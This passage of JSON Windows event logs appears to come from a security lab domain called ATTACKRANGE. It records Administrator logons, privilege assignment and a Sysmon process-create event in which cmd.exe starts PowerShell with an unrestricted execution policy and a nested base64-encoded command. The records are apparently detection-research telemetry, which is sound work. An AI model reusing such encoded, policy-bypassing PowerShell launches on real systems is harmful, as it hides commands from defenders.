Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220637,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E474\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e474","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220638,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E474\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e474","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.288\r\nProcessGuid: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nParentProcessId: 4360\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.288","ProcessGuid":"{41C8662E-20D7-5F25-0000-00106CE50800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-0010ADE40800}","ParentProcessId":"4360","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGc